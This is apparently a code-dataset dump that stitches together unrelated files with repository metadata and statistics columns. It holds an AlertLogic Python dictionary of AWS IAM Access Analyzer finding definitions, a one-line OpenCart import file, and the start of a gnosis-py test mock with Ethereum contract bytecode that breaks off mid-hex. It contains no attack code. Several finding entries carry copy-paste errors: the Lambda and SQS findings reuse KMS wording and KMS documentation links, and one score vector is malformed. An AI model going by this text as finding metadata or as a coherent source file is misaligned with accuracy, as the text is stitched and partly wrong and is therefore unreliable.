] | 3 | 2021-04-26T15:01:24.000Z | 2021-11-09T22:05:58.000Z | al_aws_access_analyzer_collector/content/aws_access_analyzer_findings.py | alertlogic/al-aws-access-analyzer-collector | fbb0763a18489efa786083b88defde6bd652ebf1 | [
"MIT"
] | 1 | 2021-08-09T05:06:26.000Z | 2021-08-09T05:06:26.000Z |
VULNERABILITIES = {
"citadel-001": {
"id": "iam-access-analyzer-001",
"name": "IAM Access Analyzer IAM Finding",
"description": "For each instance of a resource that is shared outside of an account, Access Analyzer generates a finding. Findings include information about the access and the external principal that it is granted to. An IAM Access Analyzer IAM finding has been discovered in your account.",
"remediation": "Review the IAM Access Analyzer findings for this account.",
"resolution": "IAM Access Analyzer findings stay Active until they are archived, or the offending sharing policy is removed from the account. Review the findings for IAM roles and either archive the finding or remove the offending share policy.",
"risk": "High",
"scope": "deployment",
"ccss_score": 7.6,
"resolution_type": "enable configuration",
"reference": "https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html",
"pci_concern": "PCI DSS 3.2.1: Requirement 10: Track and monitor all access to network resources and cardholder data",
"ccss_vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/PL:R/EM:A",
"categories": ["IAM Access Analyzer", "security"],
"last_modified": "2021-05-07"
},
"citadel-002": {
"id": "iam-access-analyzer-002",
"name": "IAM Access Analyzer S3 Bucket Finding",
"description": "When Access Analyzer analyzes Amazon S3 buckets, it generates a finding when an Amazon S3 bucket policy, ACL, or access point applied to a bucket grants access to an external entity. An IAM Access Analyzer S3 Bucket finding has been discovered in your account.",
"remediation": "Review the IAM Access Analyzer findings for this account.",
"resolution": "IAM Access Analyzer findings stay Active until they are archived, or the offending sharing policy is removed from the account. Review the findings for S3 Buckets and either archive the finding or remove the offending share policy.",
"risk": "High",
"scope": "deployment",
"ccss_score": 7.6,
"resolution_type": "enable configuration",
"reference": "https://docs.aws.amazon.com/AmazonS3/latest/user-guide/set-permissions.html",
"pci_concern": "PCI DSS 3.2.1: Requirement 10: Track and monitor all access to network resources and cardholder data",
"ccss_vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/PL:R/EM:A",
"categories": ["IAM Access Analyzer", "security"],
"last_modified": "2021-05-07"
},
"citadel-003": {
"id": "iam-access-analyzer-003",
"name": "IAM Access Analyzer KMS Finding",
"description": "For AWS KMS customer master keys (CMKs), Access Analyzer analyzes the key policies and grants applied to a key. Access Analyzer generates a finding if a key policy or grant allows an external entity to access the key. If the key policy doesn't allow the Access Analyzer role to read the key metadata, an Access Denied error finding is generated. An IAM Access Analyzer KMS finding has been discovered in your account.",
"remediation": "Review the IAM Access Analyzer findings for this account.",
"resolution": "IAM Access Analyzer findings stay Active until they are archived, or the offending sharing policy is removed from the account. Review the findings for KMS and either archive the finding or remove the offending share policy.",
"risk": "High",
"scope": "deployment",
"ccss_score": 7.6,
"resolution_type": "enable configuration",
"reference": "https://docs.aws.amazon.com/kms/latest/developerguide/control-access.html",
"pci_concern": "PCI DSS 3.2.1: Requirement 10: Track and monitor all access to network resources and cardholder data",
"ccss_vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/PL:R/EM:A",
"categories": ["IAM Access Analyzer", "security"],
"last_modified": "2021-05-07"
},
"citadel-004": {
"id": "iam-access-analyzer-004",
"name": "IAM Access Analyzer Full Administrative Access IAM Role Finding",
"description": "For each instance of a resource that is shared outside of an account, Access Analyzer generates a finding. Findings include information about the access and the external principal that it is granted to. An IAM Access Analyzer IAM finding with Full Administrative Access has been discovered in your account.",
"remediation": "Review the IAM Access Analyzer findings for this account.",
"resolution": "IAM Access Analyzer findings stay Active until they are archived, or the offending sharing policy is removed from the account. Review the findings for IAM Roles and either archive the finding or remove the offending share policy.",
"risk": "High",
"scope": "deployment",
"ccss_score": 10.0,
"resolution_type": "enable configuration",
"reference": "https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html",
"pci_concern": "PCI DSS 3.2.1: Requirement 10: Track and monitor all access to network resources and cardholder data",
"ccss_vector": "AV:N/AC:L/Au:N\C:C/I:C/A:C/PL:A/EM:A",
"categories": ["IAM Access Analyzer", "security"],
"last_modified": "2021-05-07"
},
"citadel-005": {
"id": "iam-access-analyzer-005",
"name": "IAM Access Analyzer Lambda Finding",
"description": "For AWS Lambda functions, Access Analyzer analyzes policies, including condition statements in a policy, that grant access to the function to an external entity. Access Analyzer also analyzes permissions granted when using the AddPermission operation of the AWS Lambda API with an EventSourceToken. An IAM Access Analyzer Lambda finding has been discovered in your account.",
"remediation": "Review the IAM Access Analyzer findings for this account.",
"resolution": "IAM Access Analyzer findings stay Active until they are archived, or the offending sharing policy is removed from the account. Review the findings for KMS and either archive the finding or remove the offending share policy.",
"risk": "High",
"scope": "deployment",
"ccss_score": 7.6,
"resolution_type": "enable configuration",
"reference": "https://docs.aws.amazon.com/kms/latest/developerguide/control-access.html",
"pci_concern": "PCI DSS 3.2.1: Requirement 10: Track and monitor all access to network resources and cardholder data",
"ccss_vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/PL:R/EM:A",
"categories": ["IAM Access Analyzer", "security"],
"last_modified": "2021-05-07"
},
"citadel-006": {
"id": "iam-access-analyzer-006",
"name": "IAM Access Analyzer SQS Finding",
"description": "For Amazon SQS queues, Access Analyzer analyzes policies, including condition statements in a policy, that allow an external entity access to a queue. An IAM Access Analyzer SQS finding has been discovered in your account.",
"remediation": "Review the IAM Access Analyzer findings for this account.",
"resolution": "IAM Access Analyzer findings stay Active until they are archived, or the offending sharing policy is removed from the account. Review the findings for KMS and either archive the finding or remove the offending share policy.",
"risk": "High",
"scope": "deployment",
"ccss_score": 7.6,
"resolution_type": "enable configuration",
"reference": "https://docs.aws.amazon.com/kms/latest/developerguide/control-access.html",
"pci_concern": "PCI DSS 3.2.1: Requirement 10: Track and monitor all access to network resources and cardholder data",
"ccss_vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/PL:R/EM:A",
"categories": ["IAM Access Analyzer", "security"],
"last_modified": "2021-05-07"
}
}
| 79.09 | 443 | 0.691111 | 1,109 | 7,909 | 4.901713 | 0.158702 | 0.115894 | 0.112583 | 0.055188 | 0.815489 | 0.779065 | 0.76858 | 0.76858 | 0.76858 | 0.766556 | 0 | 0.021091 | 0.20268 | 7,909 | 99 | 444 | 79.888889 | 0.840945 | 0 | 0 | 0.612245 | 0 | 0.306122 | 0.810572 | 0.044765 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
dd66f4611ee27310698d92ab437bfbe6f00e11f1 | 41 | py | Python | OpenCart/Drivers/__init__.py | turovod/Otus | 57433c6944bca155177b07ff361139ff30f7f692 | [
"MIT"
] | null | null | null | OpenCart/Drivers/__init__.py | turovod/Otus | 57433c6944bca155177b07ff361139ff30f7f692 | [
"MIT"
] | null | null | null | OpenCart/Drivers/__init__.py | turovod/Otus | 57433c6944bca155177b07ff361139ff30f7f692 | [
"MIT"
] | null | null | null | from .get_driver import get_driver_path
| 13.666667 | 39 | 0.853659 | 7 | 41 | 4.571429 | 0.714286 | 0.5625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121951 | 41 | 2 | 40 | 20.5 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
06e150573d7f6738dbb129da042da8c00b19be98 | 92,731 | py | Python | gnosis/eth/tests/mocks/mock_trace_filter.py | titandac/gnosis-py | cf0af4f25e64b22256eabb415d0f3fe3a6180b14 | [
"MIT"
] | 64 | 2018-09-26T19:56:50.000Z | 2022-03-18T21:45:59.000Z | gnosis/eth/tests/mocks/mock_trace_filter.py | zhanghao-ic/gnosis-py | d2a5912547b7d1b576c826909f4c1d0155db536f | [
"MIT"
] | 151 | 2018-09-10T21:42:05.000Z | 2022-03-31T12:33:31.000Z | gnosis/eth/tests/mocks/mock_trace_filter.py | zhanghao-ic/gnosis-py | d2a5912547b7d1b576c826909f4c1d0155db536f | [
"MIT"
] | 50 | 2018-12-13T20:43:46.000Z | 2022-03-30T09:32:32.000Z | from hexbytes import HexBytes
trace_filter_mock_1 = [
{
"action": {
"from": "0x4e59b44847b379578588920cA78FbF26c0B4956C",
"gas": 4619079,
"value": 0,
"init": HexBytes(
"0x608060405234801561001057600080fd5b5060016004819055506159ae80620000296000396000f3fe6080604052600436106101dc5760003560e01c8063affed0e011610102578063e19a9dd911610095578063f08a032311610064578063f08a032314611647578063f698da2514611698578063f8dc5dd9146116c3578063ffa1ad741461173e57610231565b8063e19a9dd91461139b578063e318b52b146113ec578063e75235b81461147d578063e86637db146114a857610231565b8063cc2f8452116100d1578063cc2f8452146110e8578063d4d9bdcd146111b5578063d8d11f78146111f0578063e009cfde1461132a57610231565b8063affed0e014610d94578063b4faba0914610dbf578063b63e800d14610ea7578063c4ca3a9c1461101757610231565b80635624b25b1161017a5780636a761202116101495780636a761202146109945780637d83297414610b50578063934f3a1114610bbf578063a0e67e2b14610d2857610231565b80635624b25b146107fb5780635ae6bd37146108b9578063610b592514610908578063694e80c31461095957610231565b80632f54bf6e116101b65780632f54bf6e146104d35780633408e4701461053a578063468721a7146105655780635229073f1461067a57610231565b80630d582f131461029e57806312fb68e0146102f95780632d9ad53d1461046c57610231565b36610231573373ffffffffffffffffffffffffffffffffffffffff167f3d0ce9bfc3ed7d6862dbb28b2dea94561fe714a1b4d019aa8af39730d1ad7c3d346040518082815260200191505060405180910390a2005b34801561023d57600080fd5b5060007f6c9a6c4a39284e37ed1cf53d337577d14212a4870fb976a4366c693b939918d560001b905080548061027257600080f35b36600080373360601b365260008060143601600080855af13d6000803e80610299573d6000fd5b3d6000f35b3480156102aa57600080fd5b506102f7600480360360408110156102c157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506117ce565b005b34801561030557600080fd5b5061046a6004803603608081101561031c57600080fd5b81019080803590602001909291908035906020019064010000000081111561034357600080fd5b82018360208201111561035557600080fd5b8035906020019184600183028401116401000000008311171561037757600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290803590602001906401000000008111156103da57600080fd5b8201836020820111156103ec57600080fd5b8035906020019184600183028401116401000000008311171561040e57600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050919291929080359060200190929190505050611bbe565b005b34801561047857600080fd5b506104bb6004803603602081101561048f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612440565b60405180821515815260200191505060405180910390f35b3480156104df57600080fd5b50610522600480360360208110156104f657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612512565b60405180821515815260200191505060405180910390f35b34801561054657600080fd5b5061054f6125e4565b6040518082815260200191505060405180910390f35b34801561057157600080fd5b506106626004803603608081101561058857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803590602001906401000000008111156105cf57600080fd5b8201836020820111156105e157600080fd5b8035906020019184600183028401116401000000008311171561060357600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290803560ff1690602001909291905050506125f1565b60405180821515815260200191505060405180910390f35b34801561068657600080fd5b506107776004803603608081101561069d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803590602001906401000000008111156106e457600080fd5b8201836020820111156106f657600080fd5b8035906020019184600183028401116401000000008311171561071857600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290803560ff1690602001909291905050506127d7565b60405180831515815260200180602001828103825283818151815260200191508051906020019080838360005b838110156107bf5780820151818401526020810190506107a4565b50505050905090810190601f1680156107ec5780820380516001836020036101000a031916815260200191505b50935050505060405180910390f35b34801561080757600080fd5b5061083e6004803603604081101561081e57600080fd5b81019080803590602001909291908035906020019092919050505061280d565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561087e578082015181840152602081019050610863565b50505050905090810190601f1680156108ab5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156108c557600080fd5b506108f2600480360360208110156108dc57600080fd5b8101908080359060200190929190505050612894565b6040518082815260200191505060405180910390f35b34801561091457600080fd5b506109576004803603602081101561092b57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506128ac565b005b34801561096557600080fd5b506109926004803603602081101561097c57600080fd5b8101908080359060200190929190505050612c3e565b005b610b3860048036036101408110156109ab57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803590602001906401000000008111156109f257600080fd5b820183602082011115610a0457600080fd5b80359060200191846001830284011164010000000083111715610a2657600080fd5b9091929391929390803560ff169060200190929190803590602001909291908035906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811115610ab257600080fd5b820183602082011115610ac457600080fd5b80359060200191846001830284011164010000000083111715610ae657600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290505050612d78565b60405180821515815260200191505060405180910390f35b348015610b5c57600080fd5b50610ba960048036036040811015610b7357600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506132b5565b6040518082815260200191505060405180910390f35b348015610bcb57600080fd5b50610d2660048036036060811015610be257600080fd5b810190808035906020019092919080359060200190640100000000811115610c0957600080fd5b820183602082011115610c1b57600080fd5b80359060200191846001830284011164010000000083111715610c3d57600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050919291929080359060200190640100000000811115610ca057600080fd5b820183602082011115610cb257600080fd5b80359060200191846001830284011164010000000083111715610cd457600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f8201169050808301925050505050505091929192905050506132da565b005b348015610d3457600080fd5b50610d3d613369565b6040518080602001828103825283818151815260200191508051906020019060200280838360005b83811015610d80578082015181840152602081019050610d65565b505050509050019250505060405180910390f35b348015610da057600080fd5b50610da9613512565b6040518082815260200191505060405180910390f35b348015610dcb57600080fd5b50610ea560048036036040811015610de257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811115610e1f57600080fd5b820183602082011115610e3157600080fd5b80359060200191846001830284011164010000000083111715610e5357600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290505050613518565b005b348015610eb357600080fd5b506110156004803603610100811015610ecb57600080fd5b8101908080359060200190640100000000811115610ee857600080fd5b820183602082011115610efa57600080fd5b80359060200191846020830284011164010000000083111715610f1c57600080fd5b909192939192939080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811115610f6757600080fd5b820183602082011115610f7957600080fd5b80359060200191846001830284011164010000000083111715610f9b57600080fd5b9091929391929390803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061353a565b005b34801561102357600080fd5b506110d26004803603608081101561103a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291908035906020019064010000000081111561108157600080fd5b82018360208201111561109357600080fd5b803590602001918460018302840111640100000000831117156110b557600080fd5b9091929391929390803560ff1690602001909291905050506136f8565b6040518082815260200191505060405180910390f35b3480156110f457600080fd5b506111416004803603604081101561110b57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050613820565b60405180806020018373ffffffffffffffffffffffffffffffffffffffff168152602001828103825284818151815260200191508051906020019060200280838360005b838110156111a0578082015181840152602081019050611185565b50505050905001935050505060405180910390f35b3480156111c157600080fd5b506111ee600480360360208110156111d857600080fd5b8101908080359060200190929190505050613a12565b005b3480156111fc57600080fd5b50611314600480360361014081101561121457600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291908035906020019064010000000081111561125b57600080fd5b82018360208201111561126d57600080fd5b8035906020019184600183028401116401000000008311171561128f57600080fd5b9091929391929390803560ff169060200190929190803590602001909291908035906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050613bb1565b6040518082815260200191505060405180910390f35b34801561133657600080fd5b506113996004803603604081101561134d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613bde565b005b3480156113a757600080fd5b506113ea600480360360208110156113be57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613f6f565b005b3480156113f857600080fd5b5061147b6004803603606081101561140f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613ff3565b005b34801561148957600080fd5b50611492614665565b6040518082815260200191505060405180910390f35b3480156114b457600080fd5b506115cc60048036036101408110156114cc57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291908035906020019064010000000081111561151357600080fd5b82018360208201111561152557600080fd5b8035906020019184600183028401116401000000008311171561154757600080fd5b9091929391929390803560ff169060200190929190803590602001909291908035906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035906020019092919050505061466f565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561160c5780820151818401526020810190506115f1565b50505050905090810190601f1680156116395780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561165357600080fd5b506116966004803603602081101561166a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050614817565b005b3480156116a457600080fd5b506116ad614878565b6040518082815260200191505060405180910390f35b3480156116cf57600080fd5b5061173c600480360360608110156116e657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506148f6565b005b34801561174a57600080fd5b50611753614d29565b6040518080602001828103825283818151815260200191508051906020019080838360005b83811015611793578082015181840152602081019050611778565b50505050905090810190601f1680156117c05780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6117d6614d62565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141580156118405750600173ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b801561187857503073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b6118ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146119eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60026000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508160026000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506003600081548092919060010191905055507f9465fa0c962cc76958e6373a993326400c1c94f8be2fe3a952adfa7f60b2ea2682604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a18060045414611bba57611bb981612c3e565b5b5050565b611bd2604182614e0590919063ffffffff16565b82511015611c48576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6000808060008060005b8681101561243457611c648882614e3f565b80945081955082965050505060008460ff16141561206d578260001c9450611c96604188614e0590919063ffffffff16565b8260001c1015611d0e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8751611d2760208460001c614e6e90919063ffffffff16565b1115611d9b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60006020838a01015190508851611dd182611dc360208760001c614e6e90919063ffffffff16565b614e6e90919063ffffffff16565b1115611e45576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60606020848b010190506320c13b0b60e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19168773ffffffffffffffffffffffffffffffffffffffff166320c13b0b8d846040518363ffffffff1660e01b8152600401808060200180602001838103835285818151815260200191508051906020019080838360005b83811015611ee7578082015181840152602081019050611ecc565b50505050905090810190601f168015611f145780820380516001836020036101000a031916815260200191505b50838103825284818151815260200191508051906020019080838360005b83811015611f4d578082015181840152602081019050611f32565b50505050905090810190601f168015611f7a5780820380516001836020036101000a031916815260200191505b5094505050505060206040518083038186803b158015611f9957600080fd5b505afa158015611fad573d6000803e3d6000fd5b505050506040513d6020811015611fc357600080fd5b81019080805190602001909291905050507bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614612066576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b50506122b2565b60018460ff161415612181578260001c94508473ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16148061210a57506000600860008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008c81526020019081526020016000205414155b61217c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323500000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6122b1565b601e8460ff1611156122495760018a60405160200180807f19457468657265756d205369676e6564204d6573736167653a0a333200000000815250601c018281526020019150506040516020818303038152906040528051906020012060048603858560405160008152602001604052604051808581526020018460ff1681526020018381526020018281526020019450505050506020604051602081039080840390855afa158015612238573d6000803e3d6000fd5b5050506020604051035194506122b0565b60018a85858560405160008152602001604052604051808581526020018460ff1681526020018381526020018281526020019450505050506020604051602081039080840390855afa1580156122a3573d6000803e3d6000fd5b5050506020604051035194505b5b5b8573ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161180156123795750600073ffffffffffffffffffffffffffffffffffffffff16600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b80156123b25750600173ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b612424576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323600000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8495508080600101915050611c52565b50505050505050505050565b60008173ffffffffffffffffffffffffffffffffffffffff16600173ffffffffffffffffffffffffffffffffffffffff161415801561250b5750600073ffffffffffffffffffffffffffffffffffffffff16600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b9050919050565b6000600173ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141580156125dd5750600073ffffffffffffffffffffffffffffffffffffffff16600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b9050919050565b6000804690508091505090565b6000600173ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16141580156126bc5750600073ffffffffffffffffffffffffffffffffffffffff16600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b61272e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b61273b858585855a614e8d565b9050801561278b573373ffffffffffffffffffffffffffffffffffffffff167f6895c13664aa4f67288b25d7a21d7aaa34916e355fb9b6fae0a139a9085becb860405160405180910390a26127cf565b3373ffffffffffffffffffffffffffffffffffffffff167facd2c8702804128fdb0db2bb49f6d127dd0181c13fd45dbfe16de0930e2bd37560405160405180910390a25b949350505050565b600060606127e7868686866125f1565b915060405160203d0181016040523d81523d6000602083013e8091505094509492505050565b606060006020830267ffffffffffffffff8111801561282b57600080fd5b506040519080825280601f01601f19166020018201604052801561285e5781602001600182028036833780820191505090505b50905060005b8381101561288957808501548060208302602085010152508080600101915050612864565b508091505092915050565b60076020528060005260406000206000915090505481565b6128b4614d62565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415801561291e5750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b612990576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612a91576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60016000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060016000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507fecdf3a3effea5783a3c4c2140e677577666428d44ed9d474a0b3a4c9943f844081604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a150565b612c46614d62565b600354811115612cbe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6001811015612d35576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b806004819055507f610f7ff2b304ae8903c3de74c60c6ab1f7d6226b3f52c5161905bb5ad4039c936004546040518082815260200191505060405180910390a150565b6000806000612d928e8e8e8e8e8e8e8e8e8e60055461466f565b905060056000815480929190600101919050555080805190602001209150612dbb8282866132da565b506000612dc6614ed9565b9050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614612fac578073ffffffffffffffffffffffffffffffffffffffff166375f0bb528f8f8f8f8f8f8f8f8f8f8f336040518d63ffffffff1660e01b8152600401808d73ffffffffffffffffffffffffffffffffffffffff1681526020018c8152602001806020018a6001811115612e6957fe5b81526020018981526020018881526020018781526020018673ffffffffffffffffffffffffffffffffffffffff1681526020018573ffffffffffffffffffffffffffffffffffffffff168152602001806020018473ffffffffffffffffffffffffffffffffffffffff16815260200183810383528d8d82818152602001925080828437600081840152601f19601f820116905080830192505050838103825285818151815260200191508051906020019080838360005b83811015612f3b578082015181840152602081019050612f20565b50505050905090810190601f168015612f685780820380516001836020036101000a031916815260200191505b509e50505050505050505050505050505060006040518083